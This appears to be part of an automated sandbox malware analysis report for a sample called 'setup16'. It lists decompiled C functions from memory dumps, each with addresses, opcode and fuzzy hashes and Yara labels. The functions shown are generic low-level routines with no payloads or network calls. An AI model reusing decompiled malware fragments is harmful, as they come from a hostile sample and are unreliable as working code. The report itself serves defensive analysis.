                                                                                                                                                                                                        			E049E746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E049DEB70(__ecx, 0x4ab79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04A095D0();
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                                                                                                                                        0x049e746d
                                                                                                                                                                                                        0x049e746d
                                                                                                                                                                                                        0x049e746d
                                                                                                                                                                                                        0x049e7471
                                                                                                                                                                                                        0x049e7488
                                                                                                                                                                                                        0x04a2f92d
                                                                                                                                                                                                        0x049e748e
                                                                                                                                                                                                        0x049e7491
                                                                                                                                                                                                        0x049e7495
                                                                                                                                                                                                        0x04a2f937
                                                                                                                                                                                                        0x04a2f93a
                                                                                                                                                                                                        0x04a2f94e
                                                                                                                                                                                                        0x04a2f953
                                                                                                                                                                                                        0x04a2f956
                                                                                                                                                                                                        0x04a2f956
                                                                                                                                                                                                        0x049e7495
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e7488
                                                                                                                                                                                                        0x049e7473
                                                                                                                                                                                                        0x049e7478
                                                                                                                                                                                                        0x049e747d
                                                                                                                                                                                                        0x049e7481
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049e7481
                                                                                                                                                                                                        0x049e747d
                                                                                                                                                                                                        0x049e747a
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1e0537be16c80a81b1dc5dac88004c3f2a4cba2fcc3a6830464eeaf8b04ad70a
                                                                                                                                                                                                        • Instruction ID: f33a825fe3ef30e0182bb2acc74786e9419defea17779cc549d011ccdddcb88c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e0537be16c80a81b1dc5dac88004c3f2a4cba2fcc3a6830464eeaf8b04ad70a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26F0B434600154BADF139BEAC540B797BB7AF44354F0445B5E891AB151F765B8009787
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049C4F2E Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049C4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04A988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E049EC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x49a1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                                                                                                                                        0x049c4f2e
                                                                                                                                                                                                        0x049c4f34
                                                                                                                                                                                                        0x049c4f38
                                                                                                                                                                                                        0x04a20b85
                                                                                                                                                                                                        0x04a20b85
                                                                                                                                                                                                        0x04a20b89
                                                                                                                                                                                                        0x04a20b9a
                                                                                                                                                                                                        0x04a20b9a
                                                                                                                                                                                                        0x04a20b9f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a20b9f
                                                                                                                                                                                                        0x04a20b94
                                                                                                                                                                                                        0x04a20b98
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a20b98
                                                                                                                                                                                                        0x049c4f3e
                                                                                                                                                                                                        0x049c4f48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c4f6e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c4f70

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1f1177d805f2285a2c09bd3c9c63aaa770c666cb700c7ee102d07fa6331830c4
                                                                                                                                                                                                        • Instruction ID: 3c409d62526f7598b11e8d964f7f061464241e7e79fbbb9c2664f6ea97b39e3c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f1177d805f2285a2c09bd3c9c63aaa770c666cb700c7ee102d07fa6331830c4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5F0E2325296B88FE771DB1CC344B23B7D5AB117B8F054474D50587920C734FC40D680
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A98B58 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 36%
                                                                                                                                                                                                        			E04A98B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4abd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E049E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04A0B640(E04A09AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                                                                                        0x04a98b67
                                                                                                                                                                                                        0x04a98b6f
                                                                                                                                                                                                        0x04a98b72
                                                                                                                                                                                                        0x04a98b7d
                                                                                                                                                                                                        0x04a98b8f
                                                                                                                                                                                                        0x04a98b7f
                                                                                                                                                                                                        0x04a98b88
                                                                                                                                                                                                        0x04a98b88
                                                                                                                                                                                                        0x04a98b9a
                                                                                                                                                                                                        0x04a98b9b
                                                                                                                                                                                                        0x04a98b9d
                                                                                                                                                                                                        0x04a98ba2
                                                                                                                                                                                                        0x04a98bb5

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: b0d6e25937157c4b15d6960a213dd692cf4e1307280a760290f3274b75953a85
                                                                                                                                                                                                        • Instruction ID: 630462f54364dd833dbdc876409475238b869dc87b7cda887adaba7300030439
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0d6e25937157c4b15d6960a213dd692cf4e1307280a760290f3274b75953a85
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFF054B0A142589BDB00EBA4E605A6E73F4EB04304F440459AA059B2D1EB74E900C794
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FA44B Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049FA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4ab7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L049E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E04A0FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                                                                                                                                        0x049fa44b
                                                                                                                                                                                                        0x049fa453
                                                                                                                                                                                                        0x049fa472
                                                                                                                                                                                                        0x049fa476
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fa493
                                                                                                                                                                                                        0x049fa47a
                                                                                                                                                                                                        0x049fa47f
                                                                                                                                                                                                        0x049fa486
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 391c84e883fa376c985cd027d0027e3c1815c1041ab4602d6745fddfb9bb1071
                                                                                                                                                                                                        • Instruction ID: 4a0303dfa7f944f51a08fc16dfec00973d3f59cd6f041bca534f8cecc8b1375d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 391c84e883fa376c985cd027d0027e3c1815c1041ab4602d6745fddfb9bb1071
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEE09272A01421ABD2225A1ABC00F66739DDBE8A55F094435F609D7250D668ED02C7E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049CF358 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                                                        			E049CF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E049FF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L049E4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                                                                                                                                        0x049cf35d
                                                                                                                                                                                                        0x049cf361
                                                                                                                                                                                                        0x049cf367
                                                                                                                                                                                                        0x049cf372
                                                                                                                                                                                                        0x049cf38c
                                                                                                                                                                                                        0x049cf38c
                                                                                                                                                                                                        0x049cf394

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                                                                                        • Instruction ID: 0abba6276f5df0aef52d18011ace5576d436acd983af8c74150829452f5c6720
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACE0D832A40118FBDB31A6D99D05FAABBADDB88FA0F000166B904DB194D560AD00C6D1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049DFF60 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049DFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x49a11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04A988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E049E0050(_t14);
				}
			}










                                                                                                                                                                                                        0x049dff66
                                                                                                                                                                                                        0x049dff6b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dff8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049dff8f

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 2be1515115414bc241007e6f9ef3fd1f918183f44df289ec61ece11964700f68
                                                                                                                                                                                                        • Instruction ID: 62bd79313262d91267dd60e885ab3f3d3a6d6d1adea7b646d5f9d1d22c7a9be9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2be1515115414bc241007e6f9ef3fd1f918183f44df289ec61ece11964700f68
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4E0DFB06452049FEB39DF5AD142F2D37DC9B42729F19C43DE00A4B101C621F880C256
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A541E8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E04A541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x4aa08f0);
				_t5 = E04A1D08C(__ebx, __edi, __esi);
				if( *0x4ab87ec == 0) {
					E049DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x4ab87ec == 0) {
						 *0x4ab87f0 = 0x4ab87ec;
						 *0x4ab87ec = 0x4ab87ec;
						 *0x4ab87e8 = 0x4ab87e4;
						 *0x4ab87e4 = 0x4ab87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04A54248();
				}
				return E04A1D0D1(_t5);
			}





                                                                                                                                                                                                        0x04a541e8
                                                                                                                                                                                                        0x04a541ea
                                                                                                                                                                                                        0x04a541ef
                                                                                                                                                                                                        0x04a541fb
                                                                                                                                                                                                        0x04a54206
                                                                                                                                                                                                        0x04a5420b
                                                                                                                                                                                                        0x04a54216
                                                                                                                                                                                                        0x04a5421d
                                                                                                                                                                                                        0x04a54222
                                                                                                                                                                                                        0x04a5422c
                                                                                                                                                                                                        0x04a54231
                                                                                                                                                                                                        0x04a54231
                                                                                                                                                                                                        0x04a54236
                                                                                                                                                                                                        0x04a5423d
                                                                                                                                                                                                        0x04a5423d
                                                                                                                                                                                                        0x04a54247

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 8fe6ebdb31999d90c206a95046b024dff9929049cc4a29812a24fc9a62c3728b
                                                                                                                                                                                                        • Instruction ID: 0250c41b3e4c1f512c97dc9458b00921869cbc296fe9aa89e3c0027bf1c23456
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fe6ebdb31999d90c206a95046b024dff9929049cc4a29812a24fc9a62c3728b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63F01CB4812700DFEB60FF6EA60871836ACF75831EF10415D88009B6A6C73C68C2CF81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A7D380 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E04A7D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L049CE8B0(__ecx, _a4, 0xfff);
					L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                                                                                                                                        0x04a7d38a
                                                                                                                                                                                                        0x04a7d39b
                                                                                                                                                                                                        0x04a7d3b1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a7d3b6
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                                                                                        • Instruction ID: cb0af37fa652d57a6b6b32bb38ae3640fac15a9f3c42f35d39cd88c293d0431d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3E0C231280204BBEB325E44CC00FB97B26EF807A5F104035FE085A690C679BC91E6C4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FA185 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049FA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4ab67e4 >= 0xa) {
					if(_t5 < 0x4ab6800 || _t5 >= 0x4ab6900) {
						return L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E049E0010(0x4ab67e0, _t5);
				}
			}





                                                                                                                                                                                                        0x049fa190
                                                                                                                                                                                                        0x049fa1a6
                                                                                                                                                                                                        0x049fa1c2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fa192
                                                                                                                                                                                                        0x049fa192
                                                                                                                                                                                                        0x049fa19f
                                                                                                                                                                                                        0x049fa19f

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 9269c2460fbed719926535844a0d36a8fbdc520a998542d06d250e5e9bcd6c76
                                                                                                                                                                                                        • Instruction ID: aa5d034d2c60910e5a9bc9d4dcfbff4d321ee0bf5adba322edf83725a5d2e0de
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9269c2460fbed719926535844a0d36a8fbdc520a998542d06d250e5e9bcd6c76
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8D02B612200002AF61D1781AC24F31221AE7C4718F310C2CF24B0A5A1D950FCD0C38A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F16E0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049F16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E049F1710(0x4ab67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L049E4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                                                                                                                                        0x049f16e8
                                                                                                                                                                                                        0x049f16ef
                                                                                                                                                                                                        0x049f16f3
                                                                                                                                                                                                        0x049f16fe
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f1700
                                                                                                                                                                                                        0x049f170d
                                                                                                                                                                                                        0x049f170d
                                                                                                                                                                                                        0x049f16f2
                                                                                                                                                                                                        0x049f16f2
                                                                                                                                                                                                        0x049f16f2
                                                                                                                                                                                                        0x049f16f2

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 654feca68f7a767937d1590628e95739eb2a40e758d17b4ca0bb044141350602
                                                                                                                                                                                                        • Instruction ID: 9822aef026cad717c4b5fb2d2ce700ec30a44e9d2c07db2d048642b1405126f0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 654feca68f7a767937d1590628e95739eb2a40e758d17b4ca0bb044141350602
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DD0A771110100D2FE2D5B119C05B142259DBC0B89F38007CF30B594C1DFA1FC92E5CC
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A453CA Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E04A453CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E049DEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                                                                                                                                        0x04a453ca
                                                                                                                                                                                                        0x04a453ce
                                                                                                                                                                                                        0x04a453d9
                                                                                                                                                                                                        0x04a453de
                                                                                                                                                                                                        0x04a453e1
                                                                                                                                                                                                        0x04a453e1
                                                                                                                                                                                                        0x04a453e6
                                                                                                                                                                                                        0x04a453f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a453f8
                                                                                                                                                                                                        0x04a453fb

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                                                                                                        • Instruction ID: 5814f640c10bc2ccdc695184af220f2e44d41f34a5912072818f9dfdc3e481ca
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97E08C32900B80AFCF12EB8AC660F9EB7F5FBC4B00F140454A0085F620C624BC00CB00
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0040CA04 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                        			E0040CA04(void* __eax, void* __ecx, void* __edi, void* __fp0) {

				asm("repe or edx, [eax+0x5dde4990]");
				return __eax;
			}



                                                                                                                                                                                                        0x0040ca04
                                                                                                                                                                                                        0x0040ca1d

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 08f1fa802c10b8fde52028c823629192a3e7dd2e45d9bb20a539e7eb7ddebaaf
                                                                                                                                                                                                        • Instruction ID: 3802cbf2ea24862aa35243554efdc829dab1986e4a46b5f8bb7ce7dd3a2324fc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08f1fa802c10b8fde52028c823629192a3e7dd2e45d9bb20a539e7eb7ddebaaf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4C09236B094085F8514FD4BF8814B4F379FAC72A6B2273EACA0CBB4116232D497868C
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F35A1 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049F35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E049DEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                                                                                                                                        0x049f35a1
                                                                                                                                                                                                        0x049f35a1
                                                                                                                                                                                                        0x049f35a5
                                                                                                                                                                                                        0x049f35ab
                                                                                                                                                                                                        0x049f35ab
                                                                                                                                                                                                        0x049f35b5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f35c1
                                                                                                                                                                                                        0x049f35b7

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
